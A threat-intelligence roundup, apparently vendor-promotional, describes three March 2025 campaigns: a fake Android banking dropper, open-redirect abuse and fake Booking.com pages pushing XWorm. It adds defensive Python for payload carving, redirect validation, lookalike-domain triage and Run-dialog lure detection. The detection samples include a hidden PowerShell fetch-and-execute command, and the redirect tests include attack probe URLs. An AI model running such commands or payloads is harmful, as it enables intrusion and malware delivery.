Top 3 Cyber Attacks In March 2025

Mar 27, 2025 - 04:52

March 2025 saw a sharp uptick in cyber threats that put both individual users and organizations at risk. From banking apps weaponized to steal personal data, to trusted domains abused for redirecting users to phishing traps, cybercriminals didn’t hold back.

Their tactics are growing more creative and more dangerous. 

Here’s a breakdown of the three standout attacks that made headlines this month.  

1. Fake Banking App Targeting Android Users via Telegram 

A sophisticated malware dropper was spotted mimicking the IndusInd Bank app, targeting Android users in a phishing scheme aimed at stealing sensitive financial information.  

Once installed, the malicious app displays a fake banking interface, tricking users into entering critical details like their mobile number, Aadhaar and PAN numbers, and net banking credentials. 

After the victims submit the data, it is sent to both a phishing server and a Telegram-controlled command and control (C2) channel. 

The dropper APK bundles a second package, base.apk, which is the core malicious payload, and holds the permission needed to install other apps so that it can deploy that payload. The dropper is obfuscated and uses XOR encryption with the key string “npmanager” to conceal its code and behaviour from static inspection.
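The following is an added example, not code from the article, from ANY.RUN, or from the malware: it shows how an analyst would carve and decode a repeating-key XOR payload once the key (“npmanager”, as reported above) is known. It assumes that the embedded base.apk is the XOR-encoded blob, that the key repeats byte by byte, and that the blob sits at an unknown offset and unknown key phase inside the dropper; all three are assumptions, and the dropper bytes are constructed by build_sample_dropper() rather than taken from a real sample.

```python
"""Carve and decode an XOR-obfuscated APK payload from a dropper.

Added example; not code from the article, ANY.RUN, or the malware.
Assumptions: the payload is an APK, the key repeats byte by byte, and the
blob's offset and key phase inside the dropper are unknown.
"""
import io
import zipfile
from typing import Dict, Optional, Tuple

KEY = b"npmanager"                # key string reported in the article
ZIP_LOCAL_HEADER = b"PK\x03\x04"  # every APK is a ZIP archive
ZIP_EOCD = b"PK\x05\x06"          # end-of-central-directory record


def xor_bytes(data: bytes, key: bytes, rotation: int = 0) -> bytes:
    """Repeating-key XOR. `rotation` is the key index used for data[0]."""
    if not key:
        raise ValueError("empty key")
    n = len(key)
    return bytes(b ^ key[(rotation + i) % n] for i, b in enumerate(data))


def find_xored_apk(container: bytes, key: bytes) -> Optional[Tuple[int, int]]:
    """Known-plaintext scan: the first four bytes of any APK are PK\\x03\\x04,
    so try every offset and every key phase until XOR yields that magic.
    Returns (offset, rotation) of the first hit, or None."""
    for off in range(len(container) - 3):
        window = container[off:off + 4]
        for rot in range(len(key)):
            if xor_bytes(window, key, rot) == ZIP_LOCAL_HEADER:
                return off, rot
    return None


def extract_payload(container: bytes, key: bytes) -> Optional[Dict[str, bytes]]:
    """Decode from the carved start, cut at the EOCD record, and unzip."""
    hit = find_xored_apk(container, key)
    if hit is None:
        return None
    off, rot = hit
    plain = xor_bytes(container[off:], key, rot)
    eocd = plain.rfind(ZIP_EOCD)
    if eocd < 0:
        return None
    comment_len = int.from_bytes(plain[eocd + 20:eocd + 22], "little")
    archive = plain[:eocd + 22 + comment_len]  # EOCD is 22 bytes plus comment
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def build_sample_dropper(key: bytes = KEY, rotation: int = 3) -> bytes:
    """Constructed test input (not a real sample): junk, then a tiny fake
    APK XOR-encoded from key phase `rotation`, then more junk."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("AndroidManifest.xml", "<manifest package='fake.bank'/>")
        zf.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 32)
    # 0xFF junk XORed with an ASCII key byte is always >= 0x80, so it can
    # never produce 'P' or 'K' and the scanner cannot false-hit in padding.
    return b"\xff" * 16 + xor_bytes(buf.getvalue(), key, rotation) + b"\xff" * 8


if __name__ == "__main__":
    sample = build_sample_dropper()
    print("payload found at (offset, key phase):", find_xored_apk(sample, KEY))
    for name, data in (extract_payload(sample, KEY) or {}).items():
        print(f"{name}: {len(data)} bytes")
```

The scan is a plain known-plaintext attack: because every APK starts with the ZIP local-file-header signature, the key phase does not need to be guessed and the same approach recovers the first key bytes even when the key itself is unknown.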

You can see a real-world sample of this attack in ANY.RUN’s new Android sandbox: 

View analysis session 

Banking app interface displayed inside ANY.RUN sandbox 

Inside the sandbox, let’s explore the actual interface of the fake banking app and trace how the attack unfolds.  

By following the process tree and network connections, you can observe how a user was tricked into submitting their credentials. 

Sensitive information entered by the user 

Network activity also reveals how the stolen data is sent to a phishing site, then forwarded to a Telegram-controlled command server. 

Communication with Telegram captured by ANY.RUN Android sandbox 

This type of attack highlights just how quickly mobile threats are growing. One compromised employee device can open the door to sensitive data, internal systems, and even financial accounts, putting the entire business at risk. 

That’s why it’s so important for organizations to stay ahead of these threats. Giving your team the right tools to check suspicious apps before they become a problem is a lot easier and safer than dealing with a full-blown breach later. 

Equip your team with the right tools to analyze suspicious threats in seconds inside a secure, isolated sandbox environment -> Sign up for 14-day ANY.RUN trial 

2. Trusted Websites Exploited for Malicious Redirects 

In another campaign exposed by ANY.RUN researchers in March, attackers abused the redirect functionality of long-established, trusted domains to bounce users to phishing pages. 

One such domain, registered back in 1996, was flagged as clean by antivirus tools, giving users no reason to suspect anything was wrong. 

View analysis session 

Exploitation of trusted website inside ANY.RUN sandbox 

In this ANY.RUN sandbox analysis, we can see the full picture of how the attack unfolds, starting with the abused domain, which was originally registered in 1996. 

Because the redirect endpoint did not properly validate its destination parameter (an open redirect), threat actors turned these safe-looking URLs into a launchpad for malicious sites. Since users believed they were still on a legitimate page, or simply moving between legitimate pages, they were far more likely to fall for the scam. 
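As an added example (not ANY.RUN's code, and not the code of the abused site, whose implementation the article does not show), here is the kind of weak destination check that produces an open redirect, beside a hardened version. The host name trusted.example, the ?next= parameter and the probe URLs are constructed for illustration.

```python
"""Open-redirect validation: the weak check beside a hardened one.

Added example; not ANY.RUN's code and not the abused site's code.
trusted.example, the ?next= parameter and the probes are constructed.
"""
from typing import Dict, FrozenSet, Tuple
from urllib.parse import urlsplit

SITE_HOST = "trusted.example"
ALLOWED_HOSTS: FrozenSet[str] = frozenset({SITE_HOST, "www." + SITE_HOST})


def weak_is_safe(target: str) -> bool:
    """The pattern that creates open redirects: a substring test."""
    return SITE_HOST in target


def hardened_is_safe(target: str, allowed_hosts: FrozenSet[str] = ALLOWED_HOSTS) -> bool:
    """Accept only same-site relative paths, or absolute http(s) URLs whose
    host is on an explicit allow list."""
    # Browsers normalise backslashes to slashes and strip ASCII control
    # characters, and urlsplit() silently drops tab/CR/LF, so reject them
    # before parsing rather than trusting the parser's view of the URL.
    if target != target.strip() or any(ord(c) < 0x20 or c == "\\" for c in target):
        return False
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Scheme-relative "//evil.example" already carries a netloc and never
        # reaches this branch; a real relative path starts with exactly one "/".
        return target.startswith("/") and not target.startswith("//")
    if parts.scheme not in ("http", "https"):
        return False                      # javascript:, data:, file:, ...
    if parts.username or parts.password:
        return False                      # https://trusted.example@evil.example
    host = (parts.hostname or "").lower().rstrip(".")
    return host in allowed_hosts          # rejects trusted.example.evil.example


def redirect_destination(next_param: str, fallback: str = "/") -> str:
    """What a login handler should do with ?next=: validate, else fall back."""
    return next_param if hardened_is_safe(next_param) else fallback


PROBES = [  # constructed test URLs
    "/account",
    "https://trusted.example/login",
    "https://evil.example/?ref=trusted.example",
    "//evil.example/",
    "/\\evil.example",
    "https://trusted.example@evil.example/",
    "https://trusted.example.evil.example/",
    "https:evil.example",
    "javascript:alert(1)",
]


def compare(probes=PROBES) -> Dict[str, Tuple[bool, bool]]:
    """Map each probe to (weak verdict, hardened verdict)."""
    return {p: (weak_is_safe(p), hardened_is_safe(p)) for p in probes}


if __name__ == "__main__":
    for url, (weak, hard) in compare().items():
        print(f"{url:45} weak={weak!s:5} hardened={hard}")
```

Note that the substring check fails in both directions: it waves through every attacker URL that merely mentions the site's name, and it rejects the one destination a login flow most often needs, a plain relative path.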

One hop in the chain is a fake CAPTCHA page, which the sandbox solves automatically with its built-in automated interactivity feature, saving analysts time during investigation. 

CAPTCHA solved inside ANY.RUN sandbox 

After that, the user lands on a phishing page designed to look like the Microsoft login screen. A closer look at the URL shows it is anything but real: a long string of random characters on a domain with no relation to Microsoft.

Fake Microsoft login page analyzed inside ANY.RUN sandbox 

These kinds of redirects damage user trust and make threat detection more difficult, especially when antivirus engines don’t flag them as dangerous. 

3. Fake Booking.com Pages Delivering XWorm and Stealing Card Data 

Cybercriminals love a familiar name, and this time the lure was Booking.com. 

This campaign used fake Booking-branded pages hosted on cybersquatted domains: the attackers registered domains that closely resembled the legitimate Booking site, then led users through a convincing flow that ended in either malware execution or card-data theft. 
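As an added example (not ANY.RUN's code and not a tool the article describes), this is a small lookalike-domain triage routine of the sort a security team runs over newly registered domains or URLs seen in mail logs. The brand list, the allow list and the candidate domains are constructed here; the heuristics (confusable-character substitution, brand-embedding, edit distance) are common practice, not the method used to identify the campaign above.

```python
"""Lookalike-domain triage for brand impersonation.

Added example; not ANY.RUN's code. Brands, allow list and candidate
domains are constructed; the heuristics are generic, not the article's.
"""
from typing import Optional, Tuple

BRANDS = ("booking", "microsoft")
KNOWN_GOOD = frozenset({"booking.com", "microsoft.com"})   # assumed allow list
# Substitutions attackers use because they look alike in a URL bar.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"),
               ("5", "s"), ("7", "t"), ("8", "b"), ("-", ""), ("_", ""))


def canonical(domain: str) -> str:
    """Lower-case, undefang "[.]", drop a leading www. and stray dots."""
    full = domain.lower().replace("[.]", ".").strip(".")
    return full[4:] if full.startswith("www.") else full


def registrable_label(full: str) -> str:
    """Label left of the TLD. Assumes a single-label TLD (co.uk-style
    public suffixes are not handled; use a PSL library for that)."""
    labels = full.split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def normalize(label: str) -> str:
    for src, dst in CONFUSABLES:
        label = label.replace(src, dst)
    return label


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert / delete / substitute)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain: str) -> Tuple[str, Optional[str]]:
    """Return (verdict, brand). Verdicts, from least to most suspicious:
    known-good, no-match, brand-on-other-tld, brand-embedded, typosquat."""
    full = canonical(domain)
    if full in KNOWN_GOOD:
        return "known-good", None
    label = registrable_label(full)
    norm = normalize(label)
    for brand in BRANDS:
        if label == brand:
            return "brand-on-other-tld", brand          # booking.xyz
        if norm == brand or levenshtein(norm, brand) <= max(1, len(brand) // 4):
            return "typosquat", brand                   # bo0king.net, bookng.com
        if brand in norm:
            return "brand-embedded", brand              # b00king-verify.com
    return "no-match", None


if __name__ == "__main__":
    for d in ("booking.com", "booking[.]xyz", "bo0king.net", "bookng.com",
              "b00king-verify.com", "rnicrosoft-login.com", "example.com"):
        print(f"{d:25} -> {classify(d)}")
```

The edit-distance threshold (one edit for a seven-letter brand, two for nine) is deliberately tight; loosen it and short brand names start matching ordinary words. Brand-embedding catches the other common shape, a real brand name padded with words like "verify" or "secure".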

View analysis session 

Fake booking page delivering XWorm inside ANY.RUN sandbox 

In this case, the fake page instructed users to press Win + R, paste a command, and hit Enter (the social-engineering pattern commonly called ClickFix). Doing so launched XWorm, a remote access trojan capable of stealing data and giving attackers remote control of the machine. 
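The lure depends on the victim launching the attacker's command from the Run dialog, and anything started from that dialog is spawned by explorer.exe. As an added example (not ANY.RUN's code and not a detection the article describes), the heuristic below flags a script host or download utility launched directly by explorer.exe with a command line that fetches or decodes content. The events are constructed to resemble Sysmon event-1 / EDR process-creation records; the URLs use the reserved .invalid TLD and are not indicators from the real campaign.

```python
"""Detecting the "press Win+R, paste, Enter" lure from process telemetry.

Added example; not ANY.RUN's code and not from the article. Events are
constructed; URLs use the reserved .invalid TLD and are not real IOCs.
"""
import re
from typing import Any, Dict, List

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe",
                "wscript.exe", "cscript.exe", "curl.exe", "certutil.exe"}

SUSPICIOUS_ARGS = re.compile(
    r"https?://"                                          # remote content
    r"|invoke-webrequest|\biwr\b|downloadstring|downloadfile"
    r"|frombase64string|\s-(?:e|enc|encodedcommand)\b"    # base64 payloads
    r"|\biex\b|invoke-expression"                         # run what was fetched
    r"|-urlcache|\s-decode\b",                            # certutil download/decode
    re.IGNORECASE,
)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def is_run_dialog_lure(event: Dict[str, Any]) -> bool:
    """explorer.exe -> script host/downloader, with a fetch-or-decode argument."""
    if basename(event.get("ParentImage", "")) != "explorer.exe":
        return False
    if basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return False
    return bool(SUSPICIOUS_ARGS.search(event.get("CommandLine", "")))


def triage(events: List[Dict[str, Any]]) -> List[int]:
    """Return the ProcessIds worth an analyst's attention."""
    return [e["ProcessId"] for e in events if is_run_dialog_lure(e)]


SAMPLE_EVENTS: List[Dict[str, Any]] = [  # constructed process-creation records
    {"ProcessId": 4120, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr https://verify.example.invalid/x | iex"'},
    {"ProcessId": 4121, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd"},
    {"ProcessId": 4122, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta https://verify.example.invalid/a.hta"},
    {"ProcessId": 4123, "ParentImage": r"C:\Program Files\Editor\editor.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Invoke-WebRequest https://dl.example.invalid/pkg.zip"},
    {"ProcessId": 4124, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe", "CommandLine": "notepad"},
]


if __name__ == "__main__":
    print("suspicious ProcessIds:", triage(SAMPLE_EVENTS))
```

Event 4123 is the same download command run from an editor and is deliberately not flagged: the rule keys on the explorer.exe parent to stay specific to the Run-dialog lure, and a broader download-cradle rule belongs alongside it. For forensic corroboration on a suspect host, the commands a user typed into Run are recorded under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.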

XWorm detected by ANY.RUN sandbox 

In another ANY.RUN analysis session, the phishing site prompted users to enter their credit card information to “verify their stay.” The page looked legit, but it was nothing more than a front for harvesting sensitive financial data. 

Domains like Iili[.]io were linked to this campaign and were also seen in use with the Tycoon2FA phishing kit, pointing to a more extensive shared infrastructure behind the scenes. 

The attacks we saw in March all had one thing in common: they exploited trusted names and platforms to slip past users and security tools. That’s a wake-up call for organizations everywhere. 

Here’s why quick, hands-on threat analysis is more important than ever: 

  • Popular websites and brands are being used as bait 
    From Booking.com to Microsoft, attackers are mimicking sites people trust. 
  • Redirects and fake apps are harder to catch 
    Many of these campaigns go unnoticed by antivirus tools until it’s too late. 
  • One employee’s mistake can expose your whole company 
    A single data theft can open access to internal systems, accounts, and sensitive data. 

That’s why giving your team the right tools to investigate suspicious files and links is critical. 

ANY.RUN’s interactive sandbox provides a secure, cloud-based environment to analyze threats on Windows, Linux, and Android quickly and safely. Your team can trace how an attack unfolds, capture network activity, and collect IOCs in real time. 

Protect your business before threats break through -> Start your 14-Day Trial of ANY.RUN today 

The post Top 3 Cyber Attacks In March 2025 appeared first on Cyber Security News.